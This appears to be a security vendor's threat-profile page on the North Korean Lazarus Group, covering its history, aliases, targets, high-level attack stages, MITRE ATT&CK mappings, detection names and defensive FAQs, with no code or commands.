Is Your Organization Safe from Lazarus Attacks?

The Origin of the Lazarus Group

The Lazarus group has been active since around 2009, with its first major operation known as 'Operation Troy'. They are responsible for several high-profile cyberattacks, including the 2014 Sony Pictures hack, the 2016 Bangladesh Bank heist, and the 2017 WannaCry ransomware attack.

Unlike many state-sponsored groups, Lazarus is highly financially motivated, conducting bank heists and cryptocurrency thefts to support North Korea's economy.

According to MITRE, North Korean threat group definitions often overlap significantly. Some security researchers categorize all North Korean state-sponsored cyber activity under the Lazarus Group name, rather than distinguishing between specific clusters or subgroups like Andariel, APT37, APT38, and Kimsuky.

The group used the name of Guardians of Peace for the Sony hack but is also known by other names such as Hidden Cobra (by the US Department of Homeland Security and the FBI), ZINC, NICKEL ACADEMY, Diamond Sleet (by Microsoft) and Labyrinth Chollima (by Crowdstrike).

^{Source of the Timeline:}^{Trend Micro}

Targets

Lazarus' Targets

Countries targeted by Lazarus

The group's operations have been traced globally, with confirmed activity in the United States, South Korea, India, Bangladesh, and the broader Asia-Pacific region. They have also targeted entities in Europe and the Middle East. Lazarus is known for targeting countries involved in economic sanctions or diplomatic disputes with North Korea.

Industries targeted by the Lazarus Group

Lazarus Group has shown a diverse targeting profile, including government agencies, financial institutions, defense contractors, cryptocurrency exchanges, and media companies. Their motivations vary from political espionage to financial theft, with a focus on sectors that can either generate funds for the North Korean regime or yield sensitive information.

Industries targeted by the Lazarus Group

Lazarus Group has shown a diverse targeting profile, including government agencies, financial institutions, defense contractors, cryptocurrency exchanges, and media companies. Their motivations vary from political espionage to financial theft, with a focus on sectors that can either generate funds for the North Korean regime or yield sensitive information.

Lazarus' Victims

Notable victims include Sony Pictures (2014), Bangladesh Bank (2016), and various cryptocurrency exchanges. Their activity in the financial sector, particularly through the use of destructive malware and heists, has caused millions in damages. The group has also conducted cyber espionage campaigns against South Korean institutions.

Attack Method

Lazarus Group's Attack Method

A shadowy figure casting a wide net over a digital landscape filled with various devices such as computers, smartphones, and tablets. The net symbolizes the attacker's attempts to find vulnerabilities or use phishing techniques to gain unauthorized access.

Lazarus frequently uses spear-phishing campaigns to gain initial access, often employing malicious attachments or links that deliver custom malware.

A digital ladder extending upwards from a basic user icon towards a crown symbolizing administrative privileges. This represents the attacker's efforts to gain higher-level access within the system.

After gaining access, they deploy tools such as rootkits or custom malware to elevate privileges and move deeper into networks.

A chameleon blending into a digital background, with zeroes and ones flowing around it. This represents the attacker's ability to avoid detection by security measures, changing tactics to blend in with normal network traffic.

The group is adept at evading security measures using techniques like disabling security software, leveraging stolen certificates, or exploiting zero-day vulnerabilities.

A thief with a lockpick toolkit working on a giant keyhole shaped like a login form, representing the attacker's efforts to steal user credentials to gain unauthorized access.

Lazarus uses keyloggers, credential-dumping tools, and exploits to gather user credentials, often targeting high-privilege accounts.

A magnifying glass moving over a digital map of a network, highlighting files, folders, and network connections. This image represents the phase where attackers explore the environment to understand the structure and where valuable data resides.

Once inside a system, they perform network reconnaissance to identify critical systems and data repositories using built-in commands and tools like PowerShell.

A series of interconnected nodes with a shadowy figure moving stealthily between them. This illustrates the attacker's movements within the network, seeking to gain control of additional systems or spread malware.

Lazarus moves laterally across networks using valid credentials, remote desktop protocols (RDP), or exploiting trust relationships between systems.

A large vacuum sucking up files, data icons, and folders into a bag held by a shadowy figure. This image symbolizes the process of gathering valuable data from the target network.

Sensitive data is often collected through tools like file-sharing services or malware with custom exfiltration capabilities, targeting financial data, cryptocurrency wallets, and confidential documents.

A command prompt window open in front of a digital background, with malicious code being typed out. This represents the phase where attackers execute their malicious payload within the compromised system.

The group uses custom backdoors, such as Manuscrypt and Destover, to execute commands remotely and maintain persistence.

A series of files being funneled through a covert channel out of a computer to a cloud labeled with a skull, symbolizing the unauthorized transfer of data to a location controlled by the attacker.

Stolen data is exfiltrated using compromised web servers, FTP servers, or encrypted communications channels to ensure that the information reaches their command and control infrastructure.

A cracked screen with a digital cityscape in chaos behind it, symbolizing the destructive impact of the cyberattack, such as service disruption, data destruction, or financial loss.

In financial operations, Lazarus often disrupts systems post-theft, using wiper malware to cover their tracks. They have been involved in ransomware campaigns and data destruction, further amplifying the impact on their victims.

Initial Access

Lazarus frequently uses spear-phishing campaigns to gain initial access, often employing malicious attachments or links that deliver custom malware.

Privilege Escalation

After gaining access, they deploy tools such as rootkits or custom malware to elevate privileges and move deeper into networks.

Defense Evasion

The group is adept at evading security measures using techniques like disabling security software, leveraging stolen certificates, or exploiting zero-day vulnerabilities.

Credential Access

Lazarus uses keyloggers, credential-dumping tools, and exploits to gather user credentials, often targeting high-privilege accounts.

Discovery

Once inside a system, they perform network reconnaissance to identify critical systems and data repositories using built-in commands and tools like PowerShell.

Lateral Movement

Lazarus moves laterally across networks using valid credentials, remote desktop protocols (RDP), or exploiting trust relationships between systems.

Collection

Sensitive data is often collected through tools like file-sharing services or malware with custom exfiltration capabilities, targeting financial data, cryptocurrency wallets, and confidential documents.

Execution

The group uses custom backdoors, such as Manuscrypt and Destover, to execute commands remotely and maintain persistence.

Exfiltration

Stolen data is exfiltrated using compromised web servers, FTP servers, or encrypted communications channels to ensure that the information reaches their command and control infrastructure.

Impact

In financial operations, Lazarus often disrupts systems post-theft, using wiper malware to cover their tracks. They have been involved in ransomware campaigns and data destruction, further amplifying the impact on their victims.

MITRE ATT&CK Mapping

TA0001: Initial Access

No items found.

TA0002: Execution

No items found.

TA0003: Persistence

T1053

Scheduled Task/Job

TA0004: Privilege Escalation

T1053

Scheduled Task/Job

TA0005: Defense Evasion

T1218

System Binary Proxy Execution

T1562

Impair Defenses

TA0006: Credential Access

T1003

OS Credential Dumping

TA0007: Discovery

No items found.

TA0008: Lateral Movement

No items found.

TA0009: Collection

No items found.

TA0011: Command and Control

T1105

Ingress Tool Transfer

TA0010: Exfiltration

No items found.

TA0040: Impact

T1490

Inhibit System Recovery

Platform Detections

How to Detect Lazarus with Vectra AI

File Share Enumeration

Hidden HTTPS Tunnel

Privilege Anomaly: Unusual Account on Host

Suspicious Port Sweep

View more detections

Assess your attack exposure

FAQs

What is Lazarus Group known for?

Lazarus Group is known for cyber-espionage and large-scale financial theft, including the 2014 Sony Pictures attack and the 2016 Bangladesh Bank heist.

What motivates the Lazarus Group?

Their activities are driven by North Korean state interests, including political retaliation, espionage, and generating financial resources through illicit activities.

How does Lazarus gain initial access to target systems?

They frequently use spear-phishing campaigns with malicious attachments or links to deliver malware.

What sectors are commonly targeted by Lazarus?

Lazarus targets financial institutions, cryptocurrency exchanges, media companies, and government agencies.

What malware tools are associated with Lazarus Group?

They are associated with tools like Manuscrypt, Destover, and various custom backdoors and wipers.

What makes Lazarus Group difficult to detect?

Lazarus uses advanced defense evasion techniques, such as disabling security software, obfuscating malware, and using encrypted communication channels.

What role does Lazarus play in financial crimes?

The group is involved in stealing money from banks and cryptocurrency platforms, as well as conducting ransomware and destructive attacks to extort victims.

How can organizations detect Lazarus Group activities?

Organizations should monitor for known TTPs, such as abnormal application-layer protocols, suspicious use of valid accounts, and unusual credential access activity.

What are some defensive measures to counter Lazarus Group?

Implementing multi-factor authentication (MFA), strong network segmentation, timely patching of vulnerabilities, and advanced threat detection tools can mitigate their attacks.

Has Lazarus Group been involved in ransomware attacks?

Yes, they have deployed ransomware in some of their campaigns to maximize financial gain and disrupt victims' operations.

Is Your Organization Safe from Lazarus Attacks?

Assess your attack exposure